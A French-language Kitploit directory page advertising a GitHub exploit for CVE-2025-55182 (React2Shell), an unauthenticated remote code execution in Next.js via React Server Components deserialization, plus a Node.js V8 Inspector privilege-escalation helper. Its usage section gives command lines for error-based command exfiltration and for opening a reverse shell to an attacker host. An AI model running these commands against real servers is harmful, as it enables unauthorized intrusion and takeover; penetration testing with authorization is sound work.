Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-55182 — Exploit autonome pour CVE-2025-55182 permettant une exécution de code à distance (RCE) non authentifiée dans Next.js App Router via la désérialisation Flight des React Server Components, avec shell inversé et assistant d'élévation de privilèges Node.js V8 Inspector. | Kitploit
Outils/GitHubGitHub/r3vpwnx/cve-2025-55182
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionOutil d'Accès à DistanceDéveloppement de Charges Utiles
GitHubr3vpwnx/cve-2025-55182

CVE-2025-55182

Exploit autonome pour CVE-2025-55182 permettant une exécution de code à distance (RCE) non authentifiée dans Next.js App Router via la désérialisation Flight des React Server Components, avec shell inversé et assistant d'élévation de privilèges Node.js V8 Inspector.

Voir le dépôt
il y a 20h 42mPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-55182 - React2Shell (CVE-2025-55182) RCE non authentifiée via la désérialisation Flight des React Server Components

Exploit autonome pour CVE-2025-55182 dans les applications Next.js App Router qui activent les React Server Components. Des payloads RSC Flight conçus pour le endpoint server-action permettent une exécution de code à distance non authentifiée. Inclut un assistant d'élévation de privilèges locale Node.js V8 Inspector (debug-port) qui exécute du code dans un processus privilégié via un contournement de sandbox process.mainModule.require.

CVE: CVE-2025-55182

Prérequis

root@kitploit:~
python3 -m pip install requests    # pour le(s) PoC Python

Utilisation

cdp_privesc.py

root@kitploit:~
python3 cdp_privesc.py <cible>

(RCE RSC — fourni, voir Crédits)

react2shell-poc.py
root@kitploit:~
python3 react2shell-poc.py -t http://TARGET:3000 -c "id"          # exfiltration de commande basée sur les erreurs
python3 react2shell-poc.py -t http://TARGET:3000 --revshell --lhost LHOST --lport 4444

Références

  • https://github.com/p3ta00/react2shell-poc
  • https://www.tenable.com/blog/react2shell-cve-2025-55182-react-server-components-rce

Crédits

react2shell-poc.py est le PoC public de CVE-2025-55182 de p3ta00, fourni inchangé depuis https://github.com/p3ta00/react2shell-poc pour une chaîne autonome. cdp_privesc.py (l'élévation de privilèges locale Node.js V8 Inspector) est original.

Avertissement

Pour des tests de sécurité autorisés et à des fins éducatives uniquement. Exécutez-le uniquement contre des systèmes que vous possédez ou pour lesquels vous disposez d'une autorisation écrite explicite de tester.


Auteur : r3vpwnx

Télécharger l’outil